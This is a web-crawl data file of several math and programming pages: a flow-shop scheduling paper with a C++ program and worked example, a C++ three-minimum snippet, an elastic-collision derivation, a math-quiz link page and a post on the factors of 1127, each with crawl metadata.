,……,Sr\n\nStep 10: Prepare in-out flow table only for those sequence Si (i=1,2,…r) which have job block β( k, m) and evaluate total completion time of last job of each sequence, .i.e. t1(Si) & t2(Si) on machine A & B respectively.\n\nStep 11: Evaluate completion time CT (Si) of 1stjob of each of above selected sequence Si on machine A. Step 12: Calculate utilization time Uiof 2ndmachine for each of above selected sequence Si as:\n\nUi= t2 (Si) – CT (Si) for i=1, 2 , 3,…r.\n\nStep 13: Find Min {Ui}, i=1, 2 …r. let it be corresponding to i = m, then Sm is the optimal sequence for minimum rental cost.\n\nMin rental cost = t1(Sm) × C1+ Um× C2\n\nWhere C1 & C2 are the rental cost per unit time of 1st & 2 nd machines respectively. 10. Programme #include<iostream.h> #include<stdio.h> #include<conio.h> #include<process.h> void display(); void schedule(int,int); void inout_times(int []); void update(); void time_for_job_blocks(); float min; int job_schedule; int job_schedule_final; int n; float a1,b1; float a1_jb,b1_jb; float a1_temp,b1_temp; int job_temp;\n\nint group;//variables to store two job blocks int bd1,bd2;//break down interval\n\nfloat a1_t, b1_t; float a1_in,a1_out; float b1_in,b1_out;\n\nfloat ta={32767,32767,32767,32767,32767},tb={32767,32767,32767,32767,32767}; void main()\n\n(7)\n\n{ clrscr(); int a,b; float p,q; int optimal_schedule_temp; int optimal_schedule; float cost_a,cost_b,cost;\n\nfloat min; //Variables to hold the processing times of the job blocks cout<<\"How many Jobs (<=15) : \";\n\ncin>>n; if(n<1 || n>15) {\n\ncout<<\"Wrong input, No. of jobs should be less than 15..\\n Exitting\"; getch();\n\nexit(0); }\n\ncout<<\"Enter the processing time and their respective probabilities \"; for(int i=1;i<=n;i++)\n\n{\n\ncout<<\"\\nEnter the processing time and its probability of \"<<i<<\" job for machine A : \"; cin>>a[i]>>p[i];\n\ncout<<\"\\nEnter the processing time and its probability of \"<<i<<\" job for machine B : \"; cin>>b[i]>>q[i];\n\n//Calculate the expected processing times of the jobs for the machines: a1[i] = a[i]*p[i];\n\nb1[i] = b[i]*q[i]; }\n\ncout<<\"\\nEnter the two job blocks (two numbers from 1 to \"<<n<<\") : \"; cin>>group>>group;\n\ncout<<\"\\nEnter the break down intervals : \"; cin>>bd1>>bd2;\n\ncout<<\"\\nEnter the Rental cost of machine A : \"; cin>>cost_a;\n\ncout<<\"\\nEnter the Rental cost of machine B : \"; cin>>cost_b;\n\n(8)\n\ntime_for_job_blocks(); int t = n-1;\n\nschedule(t,1);\n\n//Calculating In-Out times inout_times(job_schedule_final);\n\n//Calculating revised processing times for both the machines //That is updating a1[], and b1[]\n\nupdate();\n\n//REpeat the process for all possible sequences\n\nfor(int k=1;k<=n;k++) //Loop of all possible sequences {\n\nfor(int i=1;i<=n;i++) {\n\noptimal_schedule_temp[i]=job_schedule_final[i]; }\n\nint temp = job_schedule_final[k]; optimal_schedule_temp=temp; for(i=k;i>1;i--) { optimal_schedule_temp[i]=job_schedule_final[i-1]; } //Calling inout_times() int flag=0; for(i=1;i<n;i++) { if(optimal_schedule_temp[i]==group && optimal_schedule_temp[i+1]==group) { flag=1; break; } } if(flag==1) { inout_times(optimal_schedule_temp); ta[k]=a1_out[n]-a1_in; tb[k]=b1_out[n]-b1_in;\n\n(9)\n\nif(tb[k]<tb[k-1]) {\n\n//copy optimal_schedule_temp to optimal_schedule for(int j=1;j<=n;j++) { optimal_schedule[j]=optimal_schedule_temp[j]; } } } }\n\nfloat smalla = ta; float smallb = tb; for(int ii=2;ii<=n;ii++) { if(smalla>ta[ii]) smalla = ta[ii]; if(smallb>tb[ii]) smallb = tb[ii]; } clrscr();\n\ncout<<\"\\n\\n\\n\\n\\n\\n\\n\\n\\t\\t\\t #####THE SOLUTION##### \";\n\ncout<<\"\\n\\n\\t***************************************************************\"; cout<<\"\\n\\n\\n\\t Optimal Sequence is : \";\n\nfor (ii=1;ii<=n;ii++) {\n\ncout<<optimal_schedule[ii]<<\" \"; }\n\ncout<<\"\\n\\n\\t The smallest possible time span for machine A is : \"<<smalla; cout<<\"\\n\\n\\t The smallest possible time span for machine B is : \"<<smallb; cost = cost_a*smalla+cost_b*smallb;\n\ncout<<\"\\n\\n\\t Total Minimum Rental cost for both the machines is : \"<<cost;\n\ncout<<\"\\n\\n\\n\\t***************************************************************\"; getch();\n\n}\n\nvoid time_for_job_blocks() {\n\n//The expected processing times for two job blocks are if(b1[group]<a1[group])\n\n(10)\n\n{ min = b1[group]; } else { min = a1[group]; }\n\na1_jb = a1[group]+a1[group] - min; //(b1[k]<a1[m])?b1[k]:a1[m]; b1_jb = b1[group]+b1[group] - min; //(b1[k]<a1[m])?b1[k]:a1[m]; getch(); } void update() { for(int i=1;i<=n;i++) {\n\nif(a1_in[i]<=bd1 && a1_out[i]<=bd1 || a1_in[i]>=bd2 && a1_out[i]>=bd2) { a1_t[i] =a1_t[i]; } else { a1_t[i] += (bd2-bd1); }\n\nif(b1_in[i]<=bd1 &&b1_out[i]<=bd1 || b1_in[i]>=bd2 && b1_out[i]>=bd2) { b1_t[i] =b1_t[i]; } else { b1_t[i] += (bd2-bd1); } }\n\n//Putting values of a1_t and b1_t into a1 and b1 with proper order of jobs for(i=1;i<=n;i++)\n\n{\n\na1[job_schedule_final[i]] = a1_t[i]; b1[job_schedule_final[i]] = b1_t[i]; }\n\n(11)\n\ntime_for_job_blocks();\n\nint t = n-1; schedule(t,1); }\n\nvoid inout_times(int schedule[]) {\n\nfor(int i=1;i<=n;i++) {\n\n//Reorder the values of a1[] and b1[] according to sequence a1_t[i] = a1[schedule[i]]; b1_t[i] = b1[schedule[i]]; } for(i=1;i<=n;i++) { if(i==1) { a1_in[i]=0.0; a1_out[i] = a1_in[i]+a1_t[i]; b1_in[i] = a1_out[i]; b1_out[i] = b1_in[i]+b1_t[i]; } else { a1_in[i]=a1_out[i-1]; a1_out[i] = a1_in[i]+a1_t[i]; if(b1_out[i-1]>a1_out[i]) { b1_in[i] = b1_out[i-1]; b1_out[i] = b1_in[i]+b1_t[i]; } else { b1_in[i] = a1_out[i]; b1_out[i] = b1_in[i]+b1_t[i]; } } } }\n\n(12)\n\nint js1=1,js2=n-1; void schedule(int t, int tt) { if(t==n-1) { js1=1; js2=n-1; } if(t>0 && tt==1) {\n\nfor(int i=1,j=1;i<=n;i++,j++) //loop from 1 to n-1 as there is one group { if(i!=group&&i!=group) { a1_temp[j] = a1[i]; b1_temp[j] = b1[i]; job_temp[j] = i; }\n\nelse if(group<group && i==group) { a1_temp[j] = a1_jb; b1_temp[j] = b1_jb; job_temp[j] = -1; } else { j--; } } //Finding smallest in a1 float min1= 32767; int pos_a1; for(j=1;j<n;j++) { if(min1>a1_temp[j]) { pos_a1 = j; min1 = a1_temp[j]; } }\n\n(13)\n\n//Finding smallest in b1 float min2= 32767; int pos_b1; for(int k=1;k<n;k++) { if(min2>b1_temp[k]) { pos_b1 = k; min2 = b1_temp[k]; } } if(min1<min2) { job_schedule[js1] = job_temp[pos_a1]; js1++; a1_temp[pos_a1]=32767; b1_temp[pos_a1]=32767; } else { job_schedule[js2] = job_temp[pos_b1]; js2--; a1_temp[pos_b1]=32767; b1_temp[pos_b1]=32767; } }\n\nelse if(t>0 && tt!=1) { //Finding smallest in a1 float min1= 32767; int pos_a1; for(int i=1;i<n;i++) { if(min1>a1_temp[i]) { pos_a1 = i; min1 = a1_temp[i]; } }\n\n(14)\n\n//Finding smallest in b1 float min2= 32767; int pos_b1; for(i=1;i<n;i++) { if(min2>b1_temp[i]) { pos_b1 = i; min2 = b1_temp[i]; } } if(min1<min2) { job_schedule[js1] = job_temp[pos_a1]; js1++; a1_temp[pos_a1]=32767; b1_temp[pos_a1]=32767; } else { job_schedule[js2] = job_temp[pos_b1]; js2--; a1_temp[pos_b1]=32767; b1_temp[pos_b1]=32767; } } t--; if(t!=0) { schedule(t, 2); }\n\n//final job schedule int i=1; while(job_schedule[i]!=-1) { job_schedule_final[i]=job_schedule[i]; i++; } job_schedule_final[i]=group;\n\n(15)\n\ni++; job_schedule_final[i]=group; i++; while(i<=n) { job_schedule_final[i]=job_schedule[i-1]; i++; } 11. Numerical Illustration\n\nConsider 5 jobs and 2 machines problem to minimize the rental cost. The processing times with their respective associated probabilities are given as follows. Obtain the optimal sequence of jobs and minimum rental cost of the complete set up, given rental costs per unit time for machines M1 & M2 are 16 and 14\n\nunits respectively, and jobs (2, 5) are to be processed as an equivalent group job with the break-down interval as (5,10).\n\nJobs Machine M1 Machine M2\n\ni Ai pi Bi qi 1 11 0.1 8 0.2 2 15 0.3 11 0.2 3 14 0.1 15 0.1 4 17 0.2 16 0.2 5 12 0.3 18 0.3 Solution\n\nStep 1: The expected processing times\n\ni'and\n\n### B\n\ni' on machine A and B are as in table 1.\n\nStep 2: The processing times of equivalent job block β = (2,5) by using Maggu and Das criteria are (show in table 2) given by\n\n### A\n\n' = 4.5 +3.6 – 2.2 = 5.9 and\n\n### B\n\n' = 2.2 +5.4 - 2.2 = 5.4\n\nStep 3: Using Johnson’s two machines algorithm, the optimal sequence is S = 1, 3, β, 4 .i.e. S = 1, 3, 2, 5, 4\n\nStep 4:The in-out flow table for the sequence S = 1- 3- 2- 5- 4 is prepared (Shown in table 3).\n\nStep 5:On considering the effect of break-down interval (5, 10), the revised processing times\n\ni'' and\n\n### B\n\ni''\n\nof machines A and B are calculated (Shown in table 4).\n\nStep 6: The new processing times of equivalent job block β = (2,5) by using Maggu and Das criteria are (Shown in table 5) given by\n\n''\n\n### A\n\n= 9.5 +8.6 – 7.2 = 10.9 and\n\n### B\n\n'' = 7.2 +5.4 - 7.2 = 5.4\n\nStep 7:Using Johnson’s two machines algorithm, the optimal sequence is S 1= 1, 3, β, 4 .i.e.\n\nS1= 1 – 3 – 2 – 5 – 4\n\nStep 8: The processing time of 1st job on S1 = 1.1, .i.e. α = 1.1.\n\nStep 9: The other optimal sequences for minimizing rental cost are\n\n(16)\n\nStep 10: The in-out flow tables for sequences S1, S3 and S4 having job block (2, 5) are as shown in table 6, 7 and 8.\n\nFor S1= 1 – 3 – 2 – 5 – 4\n\nTotal time elapsed on machine A = t1(S1) = 24.0 Total time elapsed on machine B = t2(S1) = 29.2\n\nUtilization time of 2nd machine (B)= U1 = 29.2 – 1.1 = 28.1. For S3 = 3 – 1 – 2 – 5 – 4\n\nTotal time elapsed on machine A = t1(S3) = 24.0 Total time elapsed on machine B = t2(S3) = 29.2\n\nUtilization time of 2nd machine (B)= U2 = 29.2 – 1.4 = 27.8. For S4 = 4 – 1 – 3 – 2 – 5\n\nTotal time elapsed on machine A = t1(S4) = 24.0 Total time elapsed on machine B = t2(S4) = 29.4\n\nUtilization time of 2nd machine (B)= U3= 29.4 – 3.4 = 26.0\n\nThe total utilization of machine A is fixed 24.0 units and minimum utilization of B is 26.0 units for the sequence S4. Therefore the optimal sequence is S4 = 4 – 1 – 3 – 2 – 5.\n\nTherefore minimum rental cost is = 24.0 x 16 + 26.0 x 14 = 748 units. 12. Remarks\n\n1. In case the break-down interval criteria is not taken in consideration then result tally with Singh T.P. and Gupta Deepak .\n\n2. The study may further be extended if parameters like set up time, transportation time etc. are taken into consideration.\n\nReferences\n\nJohnson, S.M.(1954), Optimal two & three stage production schedules with set up times includes, Nav. Res. Log. Quart. Vol 1. pp 61-68.\n\nW.E.Smith (1956), Various optimizers for single stage production, Naval Research logistic 3, pp 89-66. Ignall E and Scharge, L(1965), Application of branch and bound technique to some flow shop scheduling problems, Operation Research 13, 400-412.\n\nBagga P.C. (1969), Sequencing in a rental situation, Journal of Canadian Operation Research Society.7 152-153.\n\nMaggu, P.L & Dass. G (1977), Equivalent jobs for job block in job sequencing, Opsearch, Vol. 14 No. 4, pp. 277-281.\n\nSzware, W. (1977), Special cases of flow shop problem, Naval Research Logistics Quarterly, 24, pp 483-492.\n\nS. Szwarc (1983), The flow shop problem with mean completion time criterion, AIIE Trans. 15, pp 172-176.\n\nSingh , T.P. (1985), On n x 2 flow shop problem solving job block, Transportation times, Arbitrary time and Break-down machine times, PAMS Vol. XXI, No. 1-2 ( 1985).\n\nAdiri; I., Bruno, J., Frostig, E. and Kan; R.A.H.G(1989),Single machine flow time scheduling with a single break-down, Acta Information, Vol.26(No.7) : 679-696.\n\nAkturk, M.S. and Gorgulu, E (1999), Match up scheduling under a machine break-down, European journal of operational research: 81-99.\n\n(17)\n\nChander Shekharn, K, Rajendra, Deepak Chanderi(1992), An efficient heuristic approach to the scheduling of jobs in a flow shop, European Journal of Operation Research 61, 318-325.\n\nSingh, T.P., K, Rajindra & Gupta Deepak (2005), Optimal three stage production schedule the processing time and set up times associated with probabilities including job block criteria, Proceeding of National Conference FACM- , 463-470.\n\nChandramouli, A.B.(2005), Heuristic approach for N job 3 machine flow shop scheduling problem involving transportation time, break-down time and weights of jobs, Mathematical and Computational Application, Vol.10 (No.2):301-305.\n\nSingh, T.P, Gupta Deepak (2006), Minimizing rental cost in two stage flow shop , the processing time associated with probabilies including job block, Reflections de ERA, Vol 1. issue 2, pp 107-120.\n\nBelwal, O.K. and Mittal Amit(2008), N jobs machine flow shop scheduling problem with break-down of machines, transportation time and equivalent job block, Bulletin of Pure & Applied Sciences-Mathematics, Jan-June,2008 Source Volume 27 Source issue: 1.\n\nNotes\n\nNote 1. Break-down time interval (a, b) for which the machines remain unavailable is deterministic in nature. The break-down interval length L = b - a is known.\n\nNote 2. Idle time of 1stmachine is always zero i.e.\n\n## \n\nn i i\n\n1 1\n\n### .\n\nNote 3. Idle time of 1st job on 2 ndmachine\n\n### I\n\ni2 = Expected processing time of 1st job on machine =\n\n### A\n\ni'. Note 4. Rental cost of machines will be minimum if idle time of 2nd machine is minimum.\n\nTable 1. The expected processing times\n\ni' and\n\n### B\n\ni' on machine A and B are\n\nJobs\n\ni'\n\n### B\n\ni' 1 1.1 1.6 2 4.5 2.2 3 1.4 1.5 4 3.4 3.2 5 3.6 5.4\n\nTable 2. The processing times after applying equivalent job block β = (2, 5) are\n\nJobs\n\ni'\n\n### B\n\ni'\n\n1 1.1 1.6\n\nβ 5.9 5.4\n\n3 1.4 1.5\n\n4 3.4 3.2\n\nTable 3. The in-out flow table for the sequence S = 1- 3- 2- 5- 4 is\n\nJobs A B\n\n(18)\n\n1 0.0- 1.1 1.1 – 2.7\n\n3 1.1 – 2.5 2.7 – 4.2\n\n2 2.5 – 6.9 6.9 – 9.1\n\n5 6.9 – 10.5 10.5 – 15.9 4 10.5 – 13.9 15.9 – 19.1\n\nTable 4. The revised processing times\n\ni'' and\n\n### B\n\ni''of machines A and B are\n\nJobs\n\ni''\n\n### B\n\ni'' 1 1.1 1.6 2 9.5 7.2 3 1.4 1.5 4 3.4 3.2 5 8.6 5.4\n\nTable 5. The new processing times of equivalent job block β = (2,5) after break-down effect are\n\nJobs\n\ni''\n\n### B\n\ni''\n\n1 1.1 1.6\n\nβ 10.9 5.4\n\n3 1.4 1.5\n\n4 3.4 3.2\n\nTable 6. The in-out flow tables for sequence S1= 1 – 3 – 2 – 5 – 4\n\nJobs A B In-Out In-Out 1 0.0- 1.1 1.1 – 2.7 3 1.1 – 2.5 2.7 – 4.2 2 2.5 – 12.0 12.0 – 19.2 5 12.0 – 20.6 20.6 – 26.0 4 20.6 – 24.0 26.0 – 29.2 Table 7. The in-out flow tables for sequence S3 = 3 – 1 – 2 – 5 – 4\n\nJobs A B In-Out In-Out 3 0.0- 1.4 1.4 – 2.9 1 1.4 – 2.5 2.9 – 4.5 2 2.5 – 12.0 12.0 – 19.2 5 12.0 – 20.6 20.6 – 26.0\n\n(19)\n\n4 20.6 – 24.0 26.0 – 29.2 Table 8. The in-out flow tables for sequence S4 = 4 – 1 – 3 – 2 – 5\n\nJobs A B In-Out In-Out 4 0.0- 3.4 3.4 – 6.6 1 3.4 – 4.5 6.6 – 8.2 3 4.5 – 5.9 8.2 – 9.7 2 5.9 – 15.4 15.4 – 22.6 5 15.4 – 24.0 24.0 – 29.4\n\n(20)\n\nUpdating...\n\n## References\n\nRelated subjects :" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.7584163,"math_prob":0.95848316,"size":26879,"snap":"2021-21-2021-25","text_gpt3_token_len":8799,"char_repetition_ratio":0.15032558,"word_repetition_ratio":0.14713897,"special_character_ratio":0.3567841,"punctuation_ratio":0.16464776,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9845183,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-05-12T21:28:21Z\",\"WARC-Record-ID\":\"<urn:uuid:5d1d0e43-bc6c-4d86-9bfa-6bc482478db3>\",\"Content-Length\":\"259015\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:ca3b5f0d-7889-400b-a5cd-17ec31d8f411>\",\"WARC-Concurrent-To\":\"<urn:uuid:23e8a2b3-660b-4d98-a0d3-139e60cb098a>\",\"WARC-IP-Address\":\"138.197.149.215\",\"WARC-Target-URI\":\"https://1library.net/document/qo12dpjz-minimizing-specified-processing-associated-probabilities-including-interval-criteria.html\",\"WARC-Payload-Digest\":\"sha1:7WQKEE6Z7C2LHHPESXFIJB3JNEE3RQJW\",\"WARC-Block-Digest\":\"sha1:MYEXELLFXIKL5SMNQ5SZSEGET2NZB743\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-21/CC-MAIN-2021-21_segments_1620243989705.28_warc_CC-MAIN-20210512193253-20210512223253-00108.warc.gz\"}"}
https://www.tutorialspoint.com/find-the-first-second-and-third-minimum-elements-in-an-array-in-cplusplus-program
[ "# Find the first, second and third minimum elements in an array in C++ program\n\nC++Server Side ProgrammingProgramming\n\n#### C in Depth: The Complete C Programming Guide for Beginners\n\n45 Lectures 4.5 hours\n\n#### Practical C++: Learn C++ Basics Step by Step\n\nMost Popular\n\n50 Lectures 4.5 hours\n\n#### Master C and Embedded C Programming- Learn as you go\n\n66 Lectures 5.5 hours\n\nSuppose we have an array of n elements. We have to find the first, second and the third minimum elements in the array. First minimum is the minimum of the array, second min is minimum but larger than the first one, and similarly the third min is minimum but greater than second min.\n\nScan through each element, then check the element, and relate the condition for first, second and third min elements conditions to solve this problem.\n\n## Example\n\n#include<iostream>\nusing namespace std;\nint getThreeMins(int arr[], int n) {\nint first = INT_MAX, sec = INT_MAX, third = INT_MAX;\nfor (int i = 0; i < n; i++) {\nif (arr[i] < first) {\nthird = sec;\nsec = first;\nfirst = arr[i];\n} else if (arr[i] < sec) {\nthird = sec;\nsec = arr[i];\n} else if (arr[i] < third)\nthird = arr[i];\n}\ncout << \"First min = \" << first << endl;\ncout << \"Second min = \" << sec << endl;\ncout << \"Third min = \" << third << endl;\n}\nint main() {\nint array[] = {4, 9, 18, 32, 12};\nint n = sizeof(array) / sizeof(array);\ngetThreeMins(array, n);\n}\n\n## Output\n\nFirst min = 4\nSecond min = 9\nThird min = 12" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.81223303,"math_prob":0.983655,"size":2861,"snap":"2022-40-2023-06","text_gpt3_token_len":718,"char_repetition_ratio":0.18655933,"word_repetition_ratio":0.09259259,"special_character_ratio":0.27333102,"punctuation_ratio":0.08527132,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99766034,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-10-06T16:38:17Z\",\"WARC-Record-ID\":\"<urn:uuid:6fccf8e6-7fa5-4184-9a9e-720739ad1c1f>\",\"Content-Length\":\"37929\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:aa5da88c-37f5-4211-ac80-020ca4c3c8d8>\",\"WARC-Concurrent-To\":\"<urn:uuid:1f9459f7-c796-4064-bc9e-f6be256e82ef>\",\"WARC-IP-Address\":\"192.229.210.176\",\"WARC-Target-URI\":\"https://www.tutorialspoint.com/find-the-first-second-and-third-minimum-elements-in-an-array-in-cplusplus-program\",\"WARC-Payload-Digest\":\"sha1:BVSTLHYIZOWCYEMBF2DYBMD2MPZ7LDAP\",\"WARC-Block-Digest\":\"sha1:ICXKRJH7SWV3DLXMRWTEB372PGVPOBB7\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-40/CC-MAIN-2022-40_segments_1664030337853.66_warc_CC-MAIN-20221006155805-20221006185805-00263.warc.gz\"}"}
https://www.meritnation.com/ask-answer/question/explain-the-derivation-of-elastic-inelastic-collision/work-energy-and-power/16855625
[ "# Explain the derivation of elastic & inelastic collision\n\nDear Student,\n\nElastic Collision in One\nDimension", null, "Consider that two perfectly elastic bodies A and B of masses M1 and M2 moving with initial velocities u1 and uundergo head on collision and continue moving along the same straight line with final velocities v1 and v2.\n\nAs in an elastic collision, momentum is conserved.\n\n∴ M1u1 M2u2 = M1v1 + M2v2 … (i)\n\nSince kinetic energy is also conserved in an elastic collision, we obtain", null, "From equation (i), we obtain\n\nM1 (u1 − v1) = M2 (v− u2) … (iii)\n\nFrom equation (ii), we obtain", null, "u1 − u2 = v2 − v1 … (v)\n\nFrom equation (v), it follows that in one-dimensional elastic collision, the relative velocity of approach (u1 − u2) before collision is equal to the relative velocity of separation (v2 − v1) after collision.\n\nThe ratio of relative velocity of separation after the collision to the relative velocity of the approach before the collision is known as coefficient of restitution or coefficient of resilience.\n\ne = v2−v1/u1−u2\n\nFor perfectly elastic collision, e = 1\n\nCalculation of velocities after collision:\n\nLet us first find the velocity of body A after collision.\n\nFrom equation (v), we have\n\nv2 = u1 − u​​​​​2 + v1\n\nSubstituting for v2 in equation (i), we obtain", null, "Again from equation (v), we have\n\nv1 v2 − u​​​​​1 + u2\n\nSubstituting for v1 in equation (i), we obtain", null, "Special Cases\n\n• When the two bodies are of equal masses i.e.,\n\nM1 = MM (say)\n\nFrom equation (vi), we have", null, "• When the target body (B) is at rest:\n\nIn this case, u2 = 0\n\nSubstituting u2 = 0 in equations (vi) and (vii), we obtain", null, "When M2 >> M1, in equation (viii) and (ix), M1 can be neglected in comparison to Mi.e.\nM1 M2  -M2 and\nM1 + M2  M2\nTherefore, we have", null, "Kindly post the different part of the question in different thread.\n\nRegards\n\n• 0\nWhat are you looking for?" ]
[ null, "https://img-nm.mnimgs.com/img/study_content/lp/1/11/4/184/655/1263/1262/25-5-09_LP_Vandana_Phy_1.11.4.6.2.6_srav_SS_html_3c44dacc.png", null, "https://s3mn.mnimgs.com/img/shared/content_ck_images/ck_617114ae0d505.jpg", null, "https://s3mn.mnimgs.com/img/shared/content_ck_images/ck_617114c7a4e2d.jpg", null, "https://s3mn.mnimgs.com/img/shared/content_ck_images/ck_617114f9c58f5.jpg", null, "https://s3mn.mnimgs.com/img/shared/content_ck_images/ck_6171150a6e9e9.jpg", null, "https://s3mn.mnimgs.com/img/shared/content_ck_images/ck_617115216033d.jpg", null, "https://s3mn.mnimgs.com/img/shared/content_ck_images/ck_6171154d385f0.jpg", null, "https://s3mn.mnimgs.com/img/shared/content_ck_images/ck_61711571a9b7a.jpg", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.83242595,"math_prob":0.9902472,"size":1765,"snap":"2021-43-2021-49","text_gpt3_token_len":493,"char_repetition_ratio":0.1737649,"word_repetition_ratio":0.012232416,"special_character_ratio":0.27932012,"punctuation_ratio":0.09063444,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99760056,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16],"im_url_duplicate_count":[null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-12-08T22:09:16Z\",\"WARC-Record-ID\":\"<urn:uuid:d78f22cb-aa3c-46f6-aa0f-13c4f63b7b6f>\",\"Content-Length\":\"49128\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:0cd7c2f9-c14c-4cf8-b364-e35c8e2eca69>\",\"WARC-Concurrent-To\":\"<urn:uuid:b67f6a3b-29d4-425a-a77d-0241f8fb025d>\",\"WARC-IP-Address\":\"13.32.208.81\",\"WARC-Target-URI\":\"https://www.meritnation.com/ask-answer/question/explain-the-derivation-of-elastic-inelastic-collision/work-energy-and-power/16855625\",\"WARC-Payload-Digest\":\"sha1:72CX3S3JKT5CMWQW3RRALHXOUR45A4AT\",\"WARC-Block-Digest\":\"sha1:LEXVGWA7QPYRIUIQVSLHFKHSYXNA6S4P\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-49/CC-MAIN-2021-49_segments_1637964363598.57_warc_CC-MAIN-20211208205849-20211208235849-00342.warc.gz\"}"}
http://www.telacommunications.com/misc/games/mathquiz/
[ "## Interactive Math Quizzes", null, "", null, "", null, "", null, "", null, "All questions have answers lower than 100. Addition, subtraction and multiplication.", null, "New! Addition, Subtraction, Multiplication and Division... all options available on our new Fraction Quiz.", null, "All answers will be below 1,000. There is an option to allow negative numbers for answers to Subtraction questions. Addition, subtraction and multiplication.", null, "Division and multiplication of fractions has now been combined with Addition and subtraction options.", null, "All answers will be between 0 and 10,000. Addition, subtraction and multiplication.", null, "Math and Money... Percentages, Interest, Commissions, Profit and Loss, Mortgages, Credit Cards and Compound Interest Calculator." ]
[ null, "http://www.telacommunications.com/misc/games/mathquiz/space180.gif", null, "http://www.telacommunications.com/misc/games/mathquiz/space180.gif", null, "http://www.telacommunications.com/misc/games/mathquiz/bmath.gif", null, "http://www.telacommunications.com/misc/games/mathquiz/fraction.gif", null, "http://www.telacommunications.com/misc/games/images/btn.gif", null, "http://www.telacommunications.com/misc/games/images/btn4.gif", null, "http://www.telacommunications.com/misc/games/images/btn2.gif", null, "http://www.telacommunications.com/misc/games/images/btn5.gif", null, "http://www.telacommunications.com/misc/games/images/btn3.gif", null, "http://www.telacommunications.com/misc/games/images/btn6.gif", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8774274,"math_prob":0.7448666,"size":682,"snap":"2020-24-2020-29","text_gpt3_token_len":136,"char_repetition_ratio":0.18436578,"word_repetition_ratio":0.05263158,"special_character_ratio":0.21847507,"punctuation_ratio":0.23966943,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9911079,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20],"im_url_duplicate_count":[null,null,null,null,null,6,null,6,null,null,null,6,null,null,null,6,null,null,null,6,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-07-11T20:43:05Z\",\"WARC-Record-ID\":\"<urn:uuid:c726fd5a-873a-4cde-a2c3-2c3085e58b22>\",\"Content-Length\":\"5733\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:dfb87927-d636-462d-95fd-cdfa7015d37a>\",\"WARC-Concurrent-To\":\"<urn:uuid:6374896e-7ced-4c4a-8c86-f447a16f77cb>\",\"WARC-IP-Address\":\"143.95.229.34\",\"WARC-Target-URI\":\"http://www.telacommunications.com/misc/games/mathquiz/\",\"WARC-Payload-Digest\":\"sha1:K3GXJULRNBNIQYMBBXGJOQ4YHLFNSHM5\",\"WARC-Block-Digest\":\"sha1:NHEVIDKIAMVR7MCCNDMVDCNJNTHT7YAT\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-29/CC-MAIN-2020-29_segments_1593655937797.57_warc_CC-MAIN-20200711192914-20200711222914-00594.warc.gz\"}"}
https://findthefactors.com/2018/07/12/1127-and-level-5/
[ "# 1127 and Level 5\n\nIf the clues in this puzzle were in a Find the Factors 1 – 12, puzzle, the needed factors might be completely different than the ones in this puzzle’s solution. Fortunately, we can only use factors from 1 to 10, so this puzzle will make you think, but shouldn’t be so difficult.", null, "Print the puzzles or type the solution in this excel file: 10-factors-1121-1133\n\nHere are a few facts about the number 1127:\n\n• 1127 is a composite number.\n• Prime factorization: 1127 = 7 × 7 × 23, which can be written 1127 = 7² × 23\n• The exponents in the prime factorization are 2 and 1. Adding one to each and multiplying we get (2 + 1)(1 + 1) = 3 × 2  = 6. Therefore 1127 has exactly 6 factors.\n• Factors of 1127: 1, 7, 23, 49, 161, 1127\n• Factor pairs: 1127 = 1 × 1127, 7 × 161, or 23 × 49\n• Taking the factor pair with the largest square number factor, we get √1127 = (√49)(√23) = 7√23 ≈ 33.57082", null, "1127 is palindrome 5115 in BASE 6 because 5(6³) + 1(6²) + 1(6) + 5(1) = 1127\n\nThis site uses Akismet to reduce spam. Learn how your comment data is processed." ]
[ null, "https://i0.wp.com/findthefactors.com/wp-content/uploads/2018/07/1127-Puzzle.jpg", null, "https://i0.wp.com/findthefactors.com/wp-content/uploads/2018/07/1127-Factor-Pairs.jpg", null ]
